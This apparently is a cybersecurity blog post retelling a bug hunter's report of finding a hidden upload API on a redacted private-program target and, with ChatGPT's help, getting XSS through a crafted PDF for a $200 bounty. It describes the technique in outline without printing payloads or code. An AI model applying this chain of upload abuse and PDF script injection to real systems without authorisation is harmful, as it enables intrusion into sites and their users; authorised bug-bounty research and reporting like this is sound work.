asd
HomeBug BountyThis Hacker using CHAT GPT to Find Vulnerability

This Hacker using CHAT GPT to Find Vulnerability

Indonesia – SECRY – Using CHAT GPT to Find Vulnerability:  Medium article share story of an bug hunter that shares an insightful journey involving ChatGPT’s contribution to discovering a critical bug. The narrative delves into the bug hunter’s approach, toolset, challenges faced, and the breakthrough that led to a substantial reward.

 

How the Hunter Starting the Hunt

The bug hunter began the hacking venture, keeping confidentiality in mind for the private program. The target, he named redacted.com, was thoroughly examined.

Initial steps included understanding the target’s functions, parameters, pages, and inspecting JavaScript code for potential sensitive data. Two key tools were used: Gospider, downloadable via “apt install gospider,” and Katana, a tool from Project Discovery.

 

Finding Hidden Paths API

Next, using these tools led to discovering several hidden paths, including `/api/REDACTED/upload.php`.

This caught his interest, and he scoured the application for a file upload feature linked to the API path. Even though this feature wasn’t visible in the application’s interface, he could still access the API request path—an important oversight.

 

Using ChatGPT‘s To Help

After recognizing the bug’s potential, the bug hunter decided to exploit it by crafting an upload request manually. Not being an expert in creating such requests, he turned to ChatGPT for help.

Then The AI’s guidance led to successfully creating a prototype Burp request for file upload. He made minor adjustments to match the request with the target’s details.

 

Exploring the Impact Method

After a successful upload, he faced a problem—the uploaded files didn’t execute payloads as expected. Despite trying different file extensions, the desired impact wasn’t achieved. He used Burp Intruder, a tool, to systematically explore allowed file types. He found out that only PDF files were permitted.

Although he almost considered giving up, the bug hunter resumed his research, working with ChatGPT to explore XSS vulnerabilities using PDF file uploads. Links shared by ChatGPT:

  • https://portswigger.net/research/portable-data-exfiltration) and
  • https://huntr.dev/bounties/f66d33df-6588-4ab4-80a0-847451517944/

The link above provided insights into injecting JavaScript code within PDF files.

 

The Bug Hunter SUCCESS got XSS via PDF Upload

After his persistence paid off as he successfully injected XSS payloads into a manipulated PDF file. When he submitted this altered payload to the target, an alert appeared on the file path, confirming the successful XSS execution.

 

Reporting the Bug and get USD 200

Finally, equipped with his discovery, he promptly reported the bug to the company. While the executed file remained on a different domain, limiting direct impact on the target, the main concern was the application’s vulnerability to arbitrary file uploads. His efforts were rewarded with a $200 bounty.

 

The Takeaway

This story highlights the collaboration between bug hunters and AI. It emphasizes the importance of ongoing research and experimentation. Readers gain a fresh perspective on cross-site scripting, adding to their toolkit for future hunting and penetration testing.

 

Link to read full write up: https://abhishekgk.medium.com/how-chatgpt-helped-me-find-a-bug-b5a3795c722

 

Christin
Christinhttps://secry.me/explore
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

6 + 13 =

Most Popular

GOOGLE ADVERTISEMENT

- Advertisement -